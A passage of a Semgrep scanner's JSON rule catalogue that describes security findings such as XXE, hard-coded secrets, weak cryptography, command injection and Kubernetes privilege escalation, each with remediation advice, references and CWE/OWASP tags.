feasible."},"help":{"markdown":"Usage of Apple's native XML Parser was observed where the parser is explicitly instructed to resolve external entities. This can lead to XXE attacks if untrusted input is parsed. Consider disabling this functionality where feasible.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.lang.xml.should-resolve-xxe.swift-xxe-prevention)\n - [https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html](https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html)\n - [https://mas.owasp.org/MASVS/controls/MASVS-CODE-4/](https://mas.owasp.org/MASVS/controls/MASVS-CODE-4/)\n - [https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)\n","text":"Usage of Apple's native XML Parser was observed where the parser is explicitly instructed to resolve external entities. This can lead to XXE attacks if untrusted input is parsed. Consider disabling this functionality where feasible."},"helpUri":"https://semgrep.dev/r/swift.lang.xml.should-resolve-xxe.swift-xxe-prevention","id":"swift.lang.xml.should-resolve-xxe.swift-xxe-prevention","name":"swift.lang.xml.should-resolve-xxe.swift-xxe-prevention","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: swift.lang.xml.should-resolve-xxe.swift-xxe-prevention"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to store keychain items with the accessibility type `kSecAttrAccessibleAlways` meaning that the data is not sufficiently protected at rest. Ideally, the application should use `kSecAttrAccessibleWhenUnlocked` to configure the data to be accessible only when the user has unlocked the screen."},"help":{"markdown":"The application was observed to store keychain items with the accessibility type `kSecAttrAccessibleAlways` meaning that the data is not sufficiently protected at rest. Ideally, the application should use `kSecAttrAccessibleWhenUnlocked` to configure the data to be accessible only when the user has unlocked the screen.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication)\n - [https://blog.elcomsoft.com/2020/08/extracting-and-decrypting-ios-keychain-physical-logical-and-cloud-options-explored/](https://blog.elcomsoft.com/2020/08/extracting-and-decrypting-ios-keychain-physical-logical-and-cloud-options-explored/)\n","text":"The application was observed to store keychain items with the accessibility type `kSecAttrAccessibleAlways` meaning that the data is not sufficiently protected at rest. Ideally, the application should use `kSecAttrAccessibleWhenUnlocked` to configure the data to be accessible only when the user has unlocked the screen."},"helpUri":"https://semgrep.dev/r/swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always","id":"swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always","name":"swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always","properties":{"precision":"very-high","tags":["CWE-272: Least Privilege Violation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected wildcard access granted to Glacier Vault. This means anyone within your AWS account ID can perform actions on Glacier resources. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::`."},"help":{"markdown":"Detected wildcard access granted to Glacier Vault. This means anyone within your AWS account ID can perform actions on Glacier resources. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected wildcard access granted to Glacier Vault. This means anyone within your AWS account ID can perform actions on Glacier resources. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::`."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal","id":"terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal","name":"terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url)\n - [https://docs.rs/tokio-postgres/latest/tokio_postgres/](https://docs.rs/tokio-postgres/latest/tokio_postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url","id":"rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url","name":"rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"ERC721 onERC721Received() reentrancy"},"help":{"markdown":"ERC721 onERC721Received() reentrancy\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.erc721-reentrancy.erc721-reentrancy)\n - [https://blocksecteam.medium.com/when-safemint-becomes-unsafe-lessons-from-the-hypebears-security-incident-2965209bda2a](https://blocksecteam.medium.com/when-safemint-becomes-unsafe-lessons-from-the-hypebears-security-incident-2965209bda2a)\n - [https://etherscan.io/address/0x14e0a1f310e2b7e321c91f58847e98b8c802f6ef](https://etherscan.io/address/0x14e0a1f310e2b7e321c91f58847e98b8c802f6ef)\n","text":"ERC721 onERC721Received() reentrancy"},"helpUri":"https://semgrep.dev/r/solidity.security.erc721-reentrancy.erc721-reentrancy","id":"solidity.security.erc721-reentrancy.erc721-reentrancy","name":"solidity.security.erc721-reentrancy.erc721-reentrancy","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.erc721-reentrancy.erc721-reentrancy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The host for this proxy URL is dynamically determined. This can be dangerous if the host can be injected by an attacker because it may forcibly alter destination of the proxy. Consider hardcoding acceptable destinations and retrieving them with 'map' or something similar."},"help":{"markdown":"The host for this proxy URL is dynamically determined. This can be dangerous if the host can be injected by an attacker because it may forcibly alter destination of the proxy. Consider hardcoding acceptable destinations and retrieving them with 'map' or something similar.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host)\n - [https://nginx.org/en/docs/http/ngx_http_map_module.html](https://nginx.org/en/docs/http/ngx_http_map_module.html)\n","text":"The host for this proxy URL is dynamically determined. This can be dangerous if the host can be injected by an attacker because it may forcibly alter destination of the proxy. Consider hardcoding acceptable destinations and retrieving them with 'map' or something similar."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host","id":"generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host","name":"generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host","properties":{"precision":"very-high","tags":["CWE-441: Unintended Proxy or Intermediary ('Confused Deputy')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"DOCTYPE declarations are enabled for this TransformerFactory. This is vulnerable to XML external entity attacks. Disable this by setting the attributes \"accessExternalDTD\" and \"accessExternalStylesheet\" to \"\"."},"help":{"markdown":"DOCTYPE declarations are enabled for this TransformerFactory. This is vulnerable to XML external entity attacks. Disable this by setting the attributes \"accessExternalDTD\" and \"accessExternalStylesheet\" to \"\".\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://blog.sonarsource.com/secure-xml-processor](https://blog.sonarsource.com/secure-xml-processor)\n - [https://xerces.apache.org/xerces2-j/features.html](https://xerces.apache.org/xerces2-j/features.html)\n","text":"DOCTYPE declarations are enabled for this TransformerFactory. This is vulnerable to XML external entity attacks. Disable this by setting the attributes \"accessExternalDTD\" and \"accessExternalStylesheet\" to \"\"."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled","id":"java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled","name":"java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret","id":"python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret","name":"python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret","id":"csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret","name":"csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"help":{"markdown":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.use-of-md5.use-of-md5)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.use-of-md5.use-of-md5","id":"kotlin.lang.security.use-of-md5.use-of-md5","name":"kotlin.lang.security.use-of-md5.use-of-md5","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.use-of-md5.use-of-md5"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"NullCipher was detected. This will not encrypt anything; the cipher text will be the same as the plain text. Use a valid, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"help":{"markdown":"NullCipher was detected. This will not encrypt anything; the cipher text will be the same as the plain text. Use a valid, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.no-null-cipher.no-null-cipher)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"NullCipher was detected. This will not encrypt anything; the cipher text will be the same as the plain text. Use a valid, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.no-null-cipher.no-null-cipher","id":"kotlin.lang.security.no-null-cipher.no-null-cipher","name":"kotlin.lang.security.no-null-cipher.no-null-cipher","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.no-null-cipher.no-null-cipher"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret","id":"swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret","name":"swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected DynamoDB query params that are tainted by `$EVENT` object. This could lead to NoSQL injection if the variable is user-controlled and not properly sanitized. Explicitly assign query params instead of passing data from `$EVENT` directly to DynamoDB client."},"help":{"markdown":"Detected DynamoDB query params that are tainted by `$EVENT` object. This could lead to NoSQL injection if the variable is user-controlled and not properly sanitized. Explicitly assign query params instead of passing data from `$EVENT` directly to DynamoDB client.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected DynamoDB query params that are tainted by `$EVENT` object. This could lead to NoSQL injection if the variable is user-controlled and not properly sanitized. Explicitly assign query params instead of passing data from `$EVENT` directly to DynamoDB client."},"helpUri":"https://semgrep.dev/r/javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object","id":"javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object","name":"javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"No token revoking configured for `express-jwt`. A leaked token could still be used and unable to be revoked. Consider using function as the `isRevoked` option."},"help":{"markdown":"No token revoking configured for `express-jwt`. A leaked token could still be used and unable to be revoked. Consider using function as the `isRevoked` option.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"No token revoking configured for `express-jwt`. A leaked token could still be used and unable to be revoked. Consider using function as the `isRevoked` option."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked","id":"javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked","name":"javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","MEDIUM CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input)\n - [https://docs.oracle.com/javase/8/docs/api/java/lang/Runtime.html](https://docs.oracle.com/javase/8/docs/api/java/lang/Runtime.html)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"helpUri":"https://semgrep.dev/r/java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input","id":"java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input","name":"java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"In Kubernetes, each pod runs in its own isolated environment with its own set of security policies. However, certain container images may contain `setuid` or `setgid` binaries that could allow an attacker to perform privilege escalation and gain access to sensitive resources. To mitigate this risk, it's recommended to add a `securityContext` to the container in the pod, with the parameter `allowPrivilegeEscalation` set to `false`. This will prevent the container from running any privileged processes and limit the impact of any potential attacks. In the container `$CONTAINER` this parameter is set to `true` which makes this container much more vulnerable to privelege escalation attacks."},"help":{"markdown":"In Kubernetes, each pod runs in its own isolated environment with its own set of security policies. However, certain container images may contain `setuid` or `setgid` binaries that could allow an attacker to perform privilege escalation and gain access to sensitive resources. To mitigate this risk, it's recommended to add a `securityContext` to the container in the pod, with the parameter `allowPrivilegeEscalation` set to `false`. This will prevent the container from running any privileged processes and limit the impact of any potential attacks. In the container `$CONTAINER` this parameter is set to `true` which makes this container much more vulnerable to privelege escalation attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true)\n - [https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privilege-escalation](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privilege-escalation)\n - [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)\n - [https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt](https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag)\n","text":"In Kubernetes, each pod runs in its own isolated environment with its own set of security policies. However, certain container images may contain `setuid` or `setgid` binaries that could allow an attacker to perform privilege escalation and gain access to sensitive resources. To mitigate this risk, it's recommended to add a `securityContext` to the container in the pod, with the parameter `allowPrivilegeEscalation` set to `false`. This will prevent the container from running any privileged processes and limit the impact of any potential attacks. In the container `$CONTAINER` this parameter is set to `true` which makes this container much more vulnerable to privelege escalation attacks."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true","id":"yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true","name":"yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The deprecated functions 'createCipher' and 'createDecipher' generate the same initialization vector every time. For counter modes such as CTR, GCM, or CCM this leads to break of both confidentiality and integrity, if the key is used more than once. Other modes are still affected in their strength, though they're not completely broken. Use 'createCipheriv' or 'createDecipheriv' instead."},"help":{"markdown":"The deprecated functions 'createCipher' and 'createDecipher' generate the same initialization vector every time. For counter modes such as CTR, GCM, or CCM this leads to break of both confidentiality and integrity, if the key is used more than once. Other modes are still affected in their strength, though they're not completely broken. Use 'createCipheriv' or 'createDecipheriv' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv)\n - [https://nodejs.org/api/crypto.html#cryptocreatecipheralgorithm-password-options](https://nodejs.org/api/crypto.html#cryptocreatecipheralgorithm-password-options)\n - [https://nodejs.org/api/crypto.html#cryptocreatedecipheralgorithm-password-options](https://nodejs.org/api/crypto.html#cryptocreatedecipheralgorithm-password-options)\n","text":"The deprecated functions 'createCipher' and 'createDecipher' generate the same initialization vector every time. For counter modes such as CTR, GCM, or CCM this leads to break of both confidentiality and integrity, if the key is used more than once. Other modes are still affected in their strength, though they're not completely broken. Use 'createCipheriv' or 'createDecipheriv' instead."},"helpUri":"https://semgrep.dev/r/javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv","id":"javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv","name":"javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv","properties":{"precision":"very-high","tags":["CWE-1204: Generation of Weak Initialization Vector (IV)","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found a potentially user-controllable argument in the construction of a regular expressions. This may result in excessive resource consumption when applied to certain inputs, or when the user is allowed to control the match target. Avoid allowing users to specify regular expressions processed by the server. If you must support user-controllable input in a regular expression, use an allow-list to restrict the expressions users may supply to limit catastrophic backtracking."},"help":{"markdown":"Found a potentially user-controllable argument in the construction of a regular expressions. This may result in excessive resource consumption when applied to certain inputs, or when the user is allowed to control the match target. Avoid allowing users to specify regular expressions processed by the server. If you must support user-controllable input in a regular expression, use an allow-list to restrict the expressions users may supply to limit catastrophic backtracking.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-regex-dos.check-regex-dos)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n","text":"Found a potentially user-controllable argument in the construction of a regular expressions. This may result in excessive resource consumption when applied to certain inputs, or when the user is allowed to control the match target. Avoid allowing users to specify regular expressions processed by the server. If you must support user-controllable input in a regular expression, use an allow-list to restrict the expressions users may supply to limit catastrophic backtracking."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-regex-dos.check-regex-dos","id":"ruby.rails.security.brakeman.check-regex-dos.check-regex-dos","name":"ruby.rails.security.brakeman.check-regex-dos.check-regex-dos","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-regex-dos.check-regex-dos"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the 